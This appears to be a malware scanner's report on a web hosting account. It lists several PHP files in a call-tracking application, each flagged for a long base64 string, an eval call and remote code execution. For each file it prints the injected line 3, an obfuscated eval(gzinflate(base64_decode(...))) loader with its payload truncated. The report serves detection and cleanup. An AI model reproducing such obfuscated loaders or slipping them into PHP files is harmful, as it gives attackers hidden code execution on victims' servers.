<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09/XPbNrI/62buf0DVuc7dG1uyJNuxW1nvuYl7l07S5tVJ+/pubjIgCUlISIIBQTm+uT/+dgGQBD9kUf5InBtdL5YILHYX+w0QFKdfPfv56evfX12QpYrC2R//MMVPEtJ4cdZncR9asI3RQH/rTSOmKMCqZJ99yPjqrP9/+2/O95+KKKGKeyHrE1/EisXqrP/84uwiWEDLcN3YpwZ0//V14g5U7KMaIh/fEX9JZcrUWabm+ycGUw9RKa5CNjsPIh5nKfnm69PjJ6ffkVd0waZD06cBCfxvmqrrkBEFNCxqP037JGIBp2d9GoY4yV7vf3iUCKlIJsM/9wFiqIcNEPYv37UCvPuQMXk9uLpO+dX14ibIOfWZJz7eBLLiaUZD/s8bKQZUsbc8TjJVQOkZGl5z2Xy1v/93PiehIs8vyMk/Zh0E0KDEcz5y3NOv/s7igM/...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/check_incoming_live_calls.php

Size: 4.75 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO1bbXPbNhL+bM/4P8Act5R6kmunc3dT+6xUsZXEvVRKLaWdjifD0BJk80qRKl/seFL/99vFGwEQ1EumN9cP1WRikdgFFovdxbPAam83p3kepUmQF2FWtNqne7t7u3c0nNGs5Z+H0zvaPU+TIkvjE5Kk3Sm+6ZBFmRfdjN6HcTQLC+ojm2QafFxGGc1PyA9p0iHP/kG+L2Ny/O23/yRHfz85OoJ/5NUPE4MFR6BJ0S0el/SEhMtlHE3DAqT6+j95mvhcqGje2o/ynBatg2A8GI8vR8Nrv8xpFkQz/32b/P47qbfnNA6mKTS393Y/7e0S+Mwi2sJuA5pM0xlthVkWPra8aRjHuXfW44/tDvGkZiib0MwjZz1SZCVtt1GgJ5Qpo7+V0BakyZS2/CiZxuWMfj1Nk3l0e7i8WzLR3URlEcVrSMY0u4+mNP968hDFUaqo93YPZjfkjCT0gVy8YGt2G6c3YUwOrgbno6uLy+G...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1bbXPbNhL+bM/4P8Act5R6kmunc3dT+6xUsZXEvVRKLaWdjifD0BJk80qRKl/seFL/99vFGwEQ1EumN9cP1WRikdgFFovdxbPAam83p3kepUmQF2FWtNqne7t7u3c0nNGs5Z+H0zvaPU+TIkvjE5Kk3Sm+6ZBFmRfdjN6HcTQLC+ojm2QafFxGGc1PyA9p0iHP/kG+L2Ny/O23/yRHfz85OoJ/5NUPE4MFR6BJ0S0el/SEhMtlHE3DAqT6+j95mvhcqGje2o/ynBatg2A8GI8vR8Nrv8xpFkQz/32b/P47qbfnNA6mKTS393Y/7e0S+Mwi2sJuA5pM0xlthVkWPra8aRjHuXfW44/tDvGkZiib0MwjZz1SZCVtt1GgJ5Qpo7+V0BakyZS2/CiZxuWMfj1Nk3l0e7i8WzLR3URlEcVrSMY0u4+mNP968hDFUaqo93Y...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1bbXPbNhL+bM/4P8Act5R6kmunc3dT+6xUsZXEvVRKLaWdjifD0BJk80qRKl/seFL/99vFGwEQ1EumN9cP1WRikdgFFovdxbPAam83p3kepUmQF2FWtNqne7t7u3c0nNGs5Z+H0zvaPU+TIkvjE5Kk3Sm+6ZBFmRfdjN6HcTQLC+ojm2QafFxGGc1PyA9p0iHP/kG+L2Ny/O23/yRHfz85OoJ/5NUPE4MFR6BJ0S0el/SEhMtlHE3DAqT6+j95mvhcqGje2o/ynBatg2A8GI8vR8Nrv8xpFkQz/32b/P47qbfnNA6mKTS393Y/7e0S+Mwi2sJuA5pM0xlthVkWPra8aRjHuXfW44/tDvGkZiib0MwjZz1SZCVtt1GgJ5Qpo7+V0BakyZS2/CiZxuWMfj1Nk3l0e7i8WzLR3URlEcVrSMY0u4+mNP968hDFUaqo93Y...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/update_call_flow.php

Size: 835.00 B Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAOVUTW/aQBA925L/w8RCsh01pr2GgESI21yaEgzqoaosYw+w6rI2u2slqOp/76w/gHxUitTeahtpd+bNe7M7Mzi2Qy8TGa9y9N120c8KsWLrsNyUbjBwbMuxe2SCIWz3ascTWgvMtN+7uU5uv8Tzd2axiKNZvZiO49hENViFnKBJvqzRd+PPERgnW/lMKSSOZBbdL6J4/s3LUs6TFS8evO9B4Ng/HRvoIeTrmLOh6wYNpoWahxLdlqnYJyw/5Csx5QmqLC0xUVoysX5C2QSQ6OCUphN6K8tJ8qc8O7knBnAX05vxPIJGjKGCOJrDqYjnhkfR0PXg6200i4Dlj53zcDDyumDqYrEV+G16uwrl3jd6AQTGZ2G2KcD94A4sy+yRKzzavfdem+Yvx6YPH5kmQ/+cfv3JBrMfsCoktJ0QmoqBf7ZiHBOCKq1e75agq0XOqJ+ulqP5BiUCU5AKQCkLGcKkxoPhAlFo0qlEHsK...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOVUTW/aQBA925L/w8RCsh01pr2GgESI21yaEgzqoaosYw+w6rI2u2slqOp/76w/gHxUitTeahtpd+bNe7M7Mzi2Qy8TGa9y9N120c8KsWLrsNyUbjBwbMuxe2SCIWz3ascTWgvMtN+7uU5uv8Tzd2axiKNZvZiO49hENViFnKBJvqzRd+PPERgnW/lMKSSOZBbdL6J4/s3LUs6TFS8evO9B4Ng/HRvoIeTrmLOh6wYNpoWahxLdlqnYJyw/5Csx5QmqLC0xUVoysX5C2QSQ6OCUphN6K8tJ8qc8O7knBnAX05vxPIJGjKGCOJrDqYjnhkfR0PXg6200i4Dlj53zcDDyumDqYrEV+G16uwrl3jd6AQTGZ2G2KcD94A4sy+yRKzzavfdem+Yvx6YPH5kmQ/+cfv3JBrMfsCoktJ0QmoqBf7ZiHBOCKq1e75agq0XOqJ+...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOVUTW/aQBA925L/w8RCsh01pr2GgESI21yaEgzqoaosYw+w6rI2u2slqOp/76w/gHxUitTeahtpd+bNe7M7Mzi2Qy8TGa9y9N120c8KsWLrsNyUbjBwbMuxe2SCIWz3ascTWgvMtN+7uU5uv8Tzd2axiKNZvZiO49hENViFnKBJvqzRd+PPERgnW/lMKSSOZBbdL6J4/s3LUs6TFS8evO9B4Ng/HRvoIeTrmLOh6wYNpoWahxLdlqnYJyw/5Csx5QmqLC0xUVoysX5C2QSQ6OCUphN6K8tJ8qc8O7knBnAX05vxPIJGjKGCOJrDqYjnhkfR0PXg6200i4Dlj53zcDDyumDqYrEV+G16uwrl3jd6AQTGZ2G2KcD94A4sy+yRKzzavfdem+Yvx6YPH5kmQ/+cfv3JBrMfsCoktJ0QmoqBf7ZiHBOCKq1e75agq0XOqJ+...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/checkversion.php

Size: 2.45 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEANVYe2/bOBL/ewPkO0y5OcQGIsnO9npdv7pZx2hzaLdBYyyuKAKDkiiLiSRqRSqOr8h3vyEl25Itd5vk7nDnBHVIzovz+M2whwcZ+yPnGZuJxGOtY554Ue4zx3ftNEyP2/3DPQSeSAI+XxPpHx60pMoilrR+OZpdfryafjlmMeXR8XUbRp324cHXwwPAz5HvwhAStoDzX1sFs9k2xHiyxbwm0PJzF1W0jmZXk0+/Tz59Ie+m08vZOyQn1yedk5ft4ZAsFgubtAsWIzcUUqHYb/K+PClNbzy2Xra1nVoaiyTbld3ItbnZikp/26holrE0ouhO4ngh827vWCa5SLQ3yQkhJ2txx1fjTxeX09lvZx8m6Ma1xHkkXBrB0ZnniTxRV9zfKLuRIskz7UgSKpX2HCfiHksksxfM7cpl4nOPKq3OE7FDXa97+lNhxtl4+r4gdYida3d4wmetIjBtm9R2XSrZq5ezFY2+WnubpmJ...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEANVYe2/bOBL/ewPkO0y5OcQGIsnO9npdv7pZx2hzaLdBYyyuKAKDkiiLiSRqRSqOr8h3vyEl25Itd5vk7nDnBHVIzovz+M2whwcZ+yPnGZuJxGOtY554Ue4zx3ftNEyP2/3DPQSeSAI+XxPpHx60pMoilrR+OZpdfryafjlmMeXR8XUbRp324cHXwwPAz5HvwhAStoDzX1sFs9k2xHiyxbwm0PJzF1W0jmZXk0+/Tz59Ie+m08vZOyQn1yedk5ft4ZAsFgubtAsWIzcUUqHYb/K+PClNbzy2Xra1nVoaiyTbld3ItbnZikp/26holrE0ouhO4ngh827vWCa5SLQ3yQkhJ2txx1fjTxeX09lvZx8m6Ma1xHkkXBrB0ZnniTxRV9zfKLuRIskz7UgSKpX2HCfiHksksxfM7cpl4nOPKq3OE7FDXa97+lNhxtl4+r4gdYi...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEANVYe2/bOBL/ewPkO0y5OcQGIsnO9npdv7pZx2hzaLdBYyyuKAKDkiiLiSRqRSqOr8h3vyEl25Itd5vk7nDnBHVIzovz+M2whwcZ+yPnGZuJxGOtY554Ue4zx3ftNEyP2/3DPQSeSAI+XxPpHx60pMoilrR+OZpdfryafjlmMeXR8XUbRp324cHXwwPAz5HvwhAStoDzX1sFs9k2xHiyxbwm0PJzF1W0jmZXk0+/Tz59Ie+m08vZOyQn1yedk5ft4ZAsFgubtAsWIzcUUqHYb/K+PClNbzy2Xra1nVoaiyTbld3ItbnZikp/26holrE0ouhO4ngh827vWCa5SLQ3yQkhJ2txx1fjTxeX09lvZx8m6Ma1xHkkXBrB0ZnniTxRV9zfKLuRIskz7UgSKpX2HCfiHksksxfM7cpl4nOPKq3OE7FDXa97+lNhxtl4+r4gdYi...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/companies.php

Size: 4.05 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAK0a/VPbNvvnccf/oKqM2Fdih+720RCHMpqt7FroC2H3bpTXp9hKouLYnq0Qsh7/+/tIsh3ZsUPaLe0dRHr0fH/pEbs7tn06pd4dGkcJ8qJwzCaWtbvDxsazMQuoSx9YylMDs9AL5j61M5B4GmPT3N35vLuD4OMzauDeqD+c0oQiliISIpokUWKhU3kACWQojDjQmYe+hT4ElKQUJbTNwpSTIECKPiceR+k8jqOEWz171Mfm0e7O4+5OStOURaELwAk3xOLuTkL/mrOEulHoUaOVszjnLBAMtgRQPcgHMmEh4YCvANzzR8hBIV2gNz9n6PfiAizbWp2TIAKAumLz8EjoDBksTSk39txfB8Obltht3ZpmpqQVtMFCbqISlBIS1J7yJI5SQHE1uPx9cHnTuhz853pwNXSvL89atwdYgGMTOY6DxiRI6coIe/MkcLBtY2t1+O1w+MF9e3E1bN1aDSiP1OktSB+nNKiQRtl...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK0a/VPbNvvnccf/oKqM2Fdih+720RCHMpqt7FroC2H3bpTXp9hKouLYnq0Qsh7/+/tIsh3ZsUPaLe0dRHr0fH/pEbs7tn06pd4dGkcJ8qJwzCaWtbvDxsazMQuoSx9YylMDs9AL5j61M5B4GmPT3N35vLuD4OMzauDeqD+c0oQiliISIpokUWKhU3kACWQojDjQmYe+hT4ElKQUJbTNwpSTIECKPiceR+k8jqOEWz171Mfm0e7O4+5OStOURaELwAk3xOLuTkL/mrOEulHoUaOVszjnLBAMtgRQPcgHMmEh4YCvANzzR8hBIV2gNz9n6PfiAizbWp2TIAKAumLz8EjoDBksTSk39txfB8Obltht3ZpmpqQVtMFCbqISlBIS1J7yJI5SQHE1uPx9cHnTuhz853pwNXSvL89atwdYgGMTOY6DxiRI6coIe/MkcLBtY2t...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK0a/VPbNvvnccf/oKqM2Fdih+720RCHMpqt7FroC2H3bpTXp9hKouLYnq0Qsh7/+/tIsh3ZsUPaLe0dRHr0fH/pEbs7tn06pd4dGkcJ8qJwzCaWtbvDxsazMQuoSx9YylMDs9AL5j61M5B4GmPT3N35vLuD4OMzauDeqD+c0oQiliISIpokUWKhU3kACWQojDjQmYe+hT4ElKQUJbTNwpSTIECKPiceR+k8jqOEWz171Mfm0e7O4+5OStOURaELwAk3xOLuTkL/mrOEulHoUaOVszjnLBAMtgRQPcgHMmEh4YCvANzzR8hBIV2gNz9n6PfiAizbWp2TIAKAumLz8EjoDBksTSk39txfB8Obltht3ZpmpqQVtMFCbqISlBIS1J7yJI5SQHE1uPx9cHnTuhz853pwNXSvL89atwdYgGMTOY6DxiRI6coIe/MkcLBtY2t...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/whisper.php

Size: 883.00 B Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAJ1U2Y6bMBR9JhL/4LHSCaiELOpD1QSidpo+dZ1M1YeqslhMsAQ2BTOZKM2/92JCRAuTLrwYLvecu51rfZDT7yXLKRE8oMaI8SApQzoJBI/Y1s7ibGQu9EecQv/sEFMvpLkxuhFcUi7Hcp/RF0jSBzl5SBPlMgx95CBOd+j1K0MZdjErMlLmCdgxBos+YJFRlH4hc2NIbtefPq83d19HvExH36ypNTcdBz+dYVMfIHiGgUgzj+8JC4EA6Mfulsqb2vghel+mPqSk7JHIU0+SLBacktDvkJtVPjQp6L8wP5bozAJzQnk3ynimAqkyWzGunDcv327WUNZBH2jDgkrJ+Lboht6c/rTBFeFRH6xcfbC8pUUmeEHduozlCsaDqlgN5dhVPac5uqpabh7Q6uSrKefTO4tQD4ZUQ0UOAO9grthEh9q9eXoQice3pbcFFIKekJxmiQcKwj++YAviW5cwVWH/S//u7+k17dwCTVt...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJ1U2Y6bMBR9JhL/4LHSCaiELOpD1QSidpo+dZ1M1YeqslhMsAQ2BTOZKM2/92JCRAuTLrwYLvecu51rfZDT7yXLKRE8oMaI8SApQzoJBI/Y1s7ibGQu9EecQv/sEFMvpLkxuhFcUi7Hcp/RF0jSBzl5SBPlMgx95CBOd+j1K0MZdjErMlLmCdgxBos+YJFRlH4hc2NIbtefPq83d19HvExH36ypNTcdBz+dYVMfIHiGgUgzj+8JC4EA6Mfulsqb2vghel+mPqSk7JHIU0+SLBacktDvkJtVPjQp6L8wP5bozAJzQnk3ynimAqkyWzGunDcv327WUNZBH2jDgkrJ+Lboht6c/rTBFeFRH6xcfbC8pUUmeEHduozlCsaDqlgN5dhVPac5uqpabh7Q6uSrKefTO4tQD4ZUQ0UOAO9grthEh9q9eXoQice3pbcFFIKekJx...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJ1U2Y6bMBR9JhL/4LHSCaiELOpD1QSidpo+dZ1M1YeqslhMsAQ2BTOZKM2/92JCRAuTLrwYLvecu51rfZDT7yXLKRE8oMaI8SApQzoJBI/Y1s7ibGQu9EecQv/sEFMvpLkxuhFcUi7Hcp/RF0jSBzl5SBPlMgx95CBOd+j1K0MZdjErMlLmCdgxBos+YJFRlH4hc2NIbtefPq83d19HvExH36ypNTcdBz+dYVMfIHiGgUgzj+8JC4EA6Mfulsqb2vghel+mPqSk7JHIU0+SLBacktDvkJtVPjQp6L8wP5bozAJzQnk3ynimAqkyWzGunDcv327WUNZBH2jDgkrJ+Lboht6c/rTBFeFRH6xcfbC8pUUmeEHduozlCsaDqlgN5dhVPac5uqpabh7Q6uSrKefTO4tQD4ZUQ0UOAO9grthEh9q9eXoQice3pbcFFIKekJx...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/company_report.php

Size: 2.97 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAOVZ63PbNhL/XM/4f0AQXy1dTVF2HpfKEn2OrLa5ycNjqTeXSTMakIQkNODjANCWr5P//RYPSpRESZ4k/XBzzEPkYrHY/WF3sUseHvh+f0ajT2iSCRRl6YRNW63DAzZpPJowTsd0zqSSDczSiBcx9R1LPstxs3l48MfhAYIrZrSBu2EwmlFBEZOIpIgKkYkW6psJSAtDaaZgnSKNW+iaUyIpEtRjqVSEc2TXVyRSSBZ5ngnV6vphgJvnhwefDw8klZJl6RiYhWpooqD/Lpig4yyNaOO4VLBQjGv1jjXLUU6mFPUQJnHCUv2ANTUOgZbSO3T10kg6irIkJymjEugw6gVTqi4575dkw3UIWF2DwjwjMTKgSQsUk5KqxtF4OBgOX717++G4kFSMWXz8sQLRjJKYigZ+nUVEgSEdxLMpSy2S55YHwFbWWhBbkZdTkTBj/vHH7mkTOZEXweFBV0aC5Qqp+5z2sKJz5f9Obom...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOVZ63PbNhL/XM/4f0AQXy1dTVF2HpfKEn2OrLa5ycNjqTeXSTMakIQkNODjANCWr5P//RYPSpRESZ4k/XBzzEPkYrHY/WF3sUseHvh+f0ajT2iSCRRl6YRNW63DAzZpPJowTsd0zqSSDczSiBcx9R1LPstxs3l48MfhAYIrZrSBu2EwmlFBEZOIpIgKkYkW6psJSAtDaaZgnSKNW+iaUyIpEtRjqVSEc2TXVyRSSBZ5ngnV6vphgJvnhwefDw8klZJl6RiYhWpooqD/Lpig4yyNaOO4VLBQjGv1jjXLUU6mFPUQJnHCUv2ANTUOgZbSO3T10kg6irIkJymjEugw6gVTqi4575dkw3UIWF2DwjwjMTKgSQsUk5KqxtF4OBgOX717++G4kFSMWXz8sQLRjJKYigZ+nUVEgSEdxLMpSy2S55YHwFbWWhBbkZdTkTBj/vH...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOVZ63PbNhL/XM/4f0AQXy1dTVF2HpfKEn2OrLa5ycNjqTeXSTMakIQkNODjANCWr5P//RYPSpRESZ4k/XBzzEPkYrHY/WF3sUseHvh+f0ajT2iSCRRl6YRNW63DAzZpPJowTsd0zqSSDczSiBcx9R1LPstxs3l48MfhAYIrZrSBu2EwmlFBEZOIpIgKkYkW6psJSAtDaaZgnSKNW+iaUyIpEtRjqVSEc2TXVyRSSBZ5ngnV6vphgJvnhwefDw8klZJl6RiYhWpooqD/Lpig4yyNaOO4VLBQjGv1jjXLUU6mFPUQJnHCUv2ANTUOgZbSO3T10kg6irIkJymjEugw6gVTqi4575dkw3UIWF2DwjwjMTKgSQsUk5KqxtF4OBgOX717++G4kFSMWXz8sQLRjJKYigZ+nUVEgSEdxLMpSy2S55YHwFbWWhBbkZdTkTBj/vH...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/zapier.php

Size: 5.47 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO0da3PbNvJ7ZvIfEI2noq6yJSd2r+eMnXNsOdWdX2fJ7VzdjEKTkIWGInV82HGu+e+3C4AkSFEkJNlJehEyE0sg94FdYLG7WFJPn/j0PxHz6cBzLWrUmWs5kU1bUcicjcloUm+8fPrk6RM2JMazYeRaIfPcAf3AgjAw6qMwnAx8Gkw8N6ADy7NpvdEg/336hECL7ybTdxlr+D/ZJaeXx8ccQIBgQ0ri8rPdwhuwBXcstEbyxoSi2iwzoGSz3d4hayH9EAKt+oHnhsyNaP0lufap+f7lTKhNBarHSTH3hpz7XuhZnhNUIXieIXv2z+r7VYIHcGtI7Wqg5wrQvmXRiRbUCwXq1HPX96Nw5PksNEN2S0nXHXr+2ES9VaPayqAiKF/qhtVw2wrcBQ1oqA/6gwJ6bvohMx1d4BcZrZxETsgmDiUHI49ZtFKnLzI6OvFuqU3OKYjKBdLOfTX48ynwPh1PPN/0mQ64qrYepeQ...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO0da3PbNvJ7ZvIfEI2noq6yJSd2r+eMnXNsOdWdX2fJ7VzdjEKTkIWGInV82HGu+e+3C4AkSFEkJNlJehEyE0sg94FdYLG7WFJPn/j0PxHz6cBzLWrUmWs5kU1bUcicjcloUm+8fPrk6RM2JMazYeRaIfPcAf3AgjAw6qMwnAx8Gkw8N6ADy7NpvdEg/336hECL7ybTdxlr+D/ZJaeXx8ccQIBgQ0ri8rPdwhuwBXcstEbyxoSi2iwzoGSz3d4hayH9EAKt+oHnhsyNaP0lufap+f7lTKhNBarHSTH3hpz7XuhZnhNUIXieIXv2z+r7VYIHcGtI7Wqg5wrQvmXRiRbUCwXq1HPX96Nw5PksNEN2S0nXHXr+2ES9VaPayqAiKF/qhtVw2wrcBQ1oqA/6gwJ6bvohMx1d4BcZrZxETsgmDiUHI49ZtFKnLzI6OvFuqU3...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO0da3PbNvJ7ZvIfEI2noq6yJSd2r+eMnXNsOdWdX2fJ7VzdjEKTkIWGInV82HGu+e+3C4AkSFEkJNlJehEyE0sg94FdYLG7WFJPn/j0PxHz6cBzLWrUmWs5kU1bUcicjcloUm+8fPrk6RM2JMazYeRaIfPcAf3AgjAw6qMwnAx8Gkw8N6ADy7NpvdEg/336hECL7ybTdxlr+D/ZJaeXx8ccQIBgQ0ri8rPdwhuwBXcstEbyxoSi2iwzoGSz3d4hayH9EAKt+oHnhsyNaP0lufap+f7lTKhNBarHSTH3hpz7XuhZnhNUIXieIXv2z+r7VYIHcGtI7Wqg5wrQvmXRiRbUCwXq1HPX96Nw5PksNEN2S0nXHXr+2ES9VaPayqAiKF/qhtVw2wrcBQ1oqA/6gwJ6bvohMx1d4BcZrZxETsgmDiUHI49ZtFKnLzI6OvFuqU3...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/dialNumber.php

Size: 6.08 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO08a3PbOJLfU+X/gNC+kXQ29XI8k+iVy9reWW/NJdk42bqpnE9FkZCEmCI1JOhHMv7v1w2AFEmBFKV4UpOqocu2BDYajUa/0Ghy70mrdeExziz2mXkzwueUhDQMme/tPVEfxiG3Al5v9Pee7AH4GZ0yL4b1rAUl/pQsrRnde3KA/8iQGA6z3LEXLSY0MFS3C892Iwf7edQGxFZwT6bMpeHek4D+FrGAjn3PpvUaE4C0FXHmNpfzZQ0H1oO8tWbMszjQqAUkCSC/ZS7zx3NqOTQQsIIqNq3/14Fru4Nu48veEwKXhKgbv/i2wNsjzHPoHXYxED3C0DvG4eNDfl7ID5dNApzZq4j75Ay4QANieQ75t8+Anr8FvuXYVsh1M19RazljC/qPHdF/LGBbgBlvwL/xNPLscDWLeAXd1RKe/Y34k0/U5rAmzgRWxKO30CjWcOb6E8slB+/OT9+8O7t4/fOlDosPaAKiYG+sgFk...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO08a3PbOJLfU+X/gNC+kXQ29XI8k+iVy9reWW/NJdk42bqpnE9FkZCEmCI1JOhHMv7v1w2AFEmBFKV4UpOqocu2BDYajUa/0Ghy70mrdeExziz2mXkzwueUhDQMme/tPVEfxiG3Al5v9Pee7AH4GZ0yL4b1rAUl/pQsrRnde3KA/8iQGA6z3LEXLSY0MFS3C892Iwf7edQGxFZwT6bMpeHek4D+FrGAjn3PpvUaE4C0FXHmNpfzZQ0H1oO8tWbMszjQqAUkCSC/ZS7zx3NqOTQQsIIqNq3/14Fru4Nu48veEwKXhKgbv/i2wNsjzHPoHXYxED3C0DvG4eNDfl7ID5dNApzZq4j75Ay4QANieQ75t8+Anr8FvuXYVsh1M19RazljC/qPHdF/LGBbgBlvwL/xNPLscDWLeAXd1RKe/Y34k0/U5rAmzgRWxKO30CjWcOb...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO08a3PbOJLfU+X/gNC+kXQ29XI8k+iVy9reWW/NJdk42bqpnE9FkZCEmCI1JOhHMv7v1w2AFEmBFKV4UpOqocu2BDYajUa/0Ghy70mrdeExziz2mXkzwueUhDQMme/tPVEfxiG3Al5v9Pee7AH4GZ0yL4b1rAUl/pQsrRnde3KA/8iQGA6z3LEXLSY0MFS3C892Iwf7edQGxFZwT6bMpeHek4D+FrGAjn3PpvUaE4C0FXHmNpfzZQ0H1oO8tWbMszjQqAUkCSC/ZS7zx3NqOTQQsIIqNq3/14Fru4Nu48veEwKXhKgbv/i2wNsjzHPoHXYxED3C0DvG4eNDfl7ID5dNApzZq4j75Ay4QANieQ75t8+Anr8FvuXYVsh1M19RazljC/qPHdF/LGBbgBlvwL/xNPLscDWLeAXd1RKe/Y34k0/U5rAmzgRWxKO30CjWcOb...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/edit_call_flow.php

Size: 3.39 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAJ1Z6XLbOBL+7yq/Qxv2hlKNKdnO5ehKHFtJvJXDO9Ls7pTjUkEkJGHMawHQx6T87tsASJGSKNkJk1QksNHo4+sL2t5qNk9nzLuGSSzAi6MJnzYa21t8ArWdCQ/YiN1xqWSN8MgLUp81M5pklpB6HX5sbwE+Pmc10hn3hjMmGHAJNAImRCwacGroQfOCKFZ4Thr5DbgIGJUMBHN5JBUNArDnK+opkGmSxEI1Os1xj9Tb21sP21uSScnjaITEQtX0omD/S7lgozjyWM3J5UsVD7R0jibZ3tpL6JRBFwj1Qx7pLwTX9/wxrkXsFs7eG157XhwmNOJM4jq+dXtTpk6C4DRfrll2zeYFihzE1AdjNpmZikvJVG1vNOgPBuffvl46qWRixH3nqjDSjFGfiRr5HHtUoSotCOIpj6wp25YGra2svnxScP3YH146VsL7zRxDGqGKo7k265m/KwmbMBFyY17nqnMIz57BTvmtYKF...

Exploit execution Line: 3 Dangerous

